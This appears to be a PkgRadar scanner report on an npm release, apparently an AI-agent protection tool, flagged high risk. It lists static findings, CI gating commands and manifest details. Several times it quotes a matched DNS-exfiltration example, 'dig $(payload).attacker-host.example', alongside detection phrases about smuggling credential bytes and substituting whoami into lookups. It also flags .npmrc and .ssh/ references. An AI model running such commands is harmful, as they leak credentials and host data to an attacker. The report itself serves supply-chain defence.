PkgRadar

Package evidence

@roxy-agent/[email protected]

DNS / OAST exfiltration: matched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("

Trust signals

Why this verdict

PkgRadar discounts a release’s score when public reputation argues against novel malware. The verdict above already reflects these — the panel just explains what was applied.

Versions published
14
First published
May 2026
Publisher
dwang88

Recommended action

Block this update

Static evidence trips multiple high-signal indicators. Quarantine the release until the publisher validates the change or you can rule out the indicators below.

Block this release in CIcurl · GitHub Actions

Fail the build when this package version is added or upgraded. Replace $PKGRADAR_TOKEN with a Pro / Team API key from your dashboard.

curl -fsS https://pkgradar.com/gate/npm \
  -H "Authorization: Bearer $PKGRADAR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"specs":["@roxy-agent/[email protected]"],"fail_on":"high"}'

GitHub Actions step:

- name: PkgRadar gate
  run: |
    curl -fsS https://pkgradar.com/gate/npm \
      -H "Authorization: Bearer ${{ secrets.PKGRADAR_TOKEN }}" \
      -H "Content-Type: application/json" \
      -d '{"specs":["@roxy-agent/[email protected]"],"fail_on":"high"}'
Publisherdwang88
Artifact bytes143,581
Previous version0.4.1
Published2026-05-24T02:15:52.245Z
SHA-256788b5de3522d13b3384c37ed2579175cb7829beed88379d392466b4ceee97a6a

Why flagged

What the scanner saw

DNS / OAST exfiltration: matched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("

Not observed: package install, lifecycle script execution, or sandbox execution. PkgRadar only inspects on-disk artifacts.

Availability ledger

available

high
Last checked
highRisk
55Score
0.5.0Version
Status history (4 events)
  1. availableavailable · risk high · score 55 · status available -> available, risk high -> high, score 63 -> 55
  2. availableavailable · risk high · score 63 · status available -> available, risk high -> high, score 100 -> 63
  3. availableavailable · risk high · score 100 · status available -> available, risk high -> high, score 207 -> 100
  4. newavailable · risk high · score 207 · status changed

Related candidates

Linked campaigns and clusters

Publisher / release actor burststale

dwang88

2 members · evidence strength 64
Repeated static TTPstale

DNS / OAST exfiltration — matched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("

2 members · evidence strength 70

Evidence

Static findings

5 static · 0 from release diff · showing high-signal first.

SeverityKindPathDetailPoints
highDNS / OAST exfiltrationpackage/dist/ml/prototypes.jsmatched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("30
mediumCredential file accesspackage/dist/classifier.jsmatched ".npmrc"10
Show all 5 findings (low-signal and informational)
SeverityKindPathDetailPoints
highDNS / OAST exfiltrationpackage/dist/ml/prototypes.jsmatched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("30
mediumCredential file accesspackage/dist/classifier.jsmatched ".npmrc"10
lowMessenger Bot Endpointpackage/dist/dashboard/client.jsmatched "hooks.slack.com/services/" — messenger-bot URL without exfil context (likely a notification handler)5
lowCredential file accesspackage/dist/protection.jsmatched ".ssh/"5
lowCredential file accesspackage/dist/ml/prototypes.jsmatched ".ssh/"5

Manifest

Package metadata

Scripts7
  • buildtsc && node scripts/postbuild.mjs
  • devtsx src/index.ts
  • dev:watchtsx watch src/index.ts
  • prepacknpm run build
  • prepublishOnlynpm run build
  • startnode dist/index.js
  • typechecktsc --noEmit
Dependencies7
  • @huggingface/transformers^4.2.0
  • @modelcontextprotocol/sdk^1.29.0
  • better-sqlite3^12.9.0
  • echarts^6.0.0
  • express^4.21.2
  • geist^1.7.0
  • zod^3.25.76